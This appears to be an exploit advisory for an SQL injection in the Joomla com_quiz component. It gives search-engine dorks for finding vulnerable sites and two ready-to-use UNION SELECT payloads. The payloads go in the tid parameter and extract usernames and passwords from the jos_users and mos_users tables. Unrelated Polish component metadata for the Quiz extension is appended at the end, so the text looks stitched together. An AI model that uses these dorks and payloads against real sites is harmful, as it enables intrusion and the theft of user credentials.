############################################################### # # joomla SQL Injection(com_quiz)user_tst_shw # ############################################################### # # AUTHOR : S@BUN # # HOME : http://www.hackturkiye.com # http://www.milw0rm.com/author/1334 # # MAİL : hackturkiye.hackturkiye@gmail.com # # ################################################################ # # DORK 1 : allinurl: com_quiz"tid" # # DORK 2 : allinurl: com_quiz # ################################################################ EXPLOIT : ALL PASSWORD AND USERNAME UNDER PAGE EXAMPLE: AFTER tid add EXPLOİTS www.xxxxxxxx.com/index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid= [EXPLOİT] EXPLOIT=1= 1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/jos_users/* EXPLOİT=2= 1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/* ################################################################ # S@BUN i AM NOT HACKER S@BUN ################################################################ Quiz 25.10.2005 Ioannis Sannos Ioannis Sannos blackgate@datahellas.com http://www.datahellas.com 0.81 Komponent Quiz dla Joomla. Umożliwia tworzenie w kilku krokach testów/quizów oraz zarządzanie nimi. Autor: Ioannis Sannos (DataHellas). Polska adaptacja i AdminLanguage: zwiastun@zwiastun.net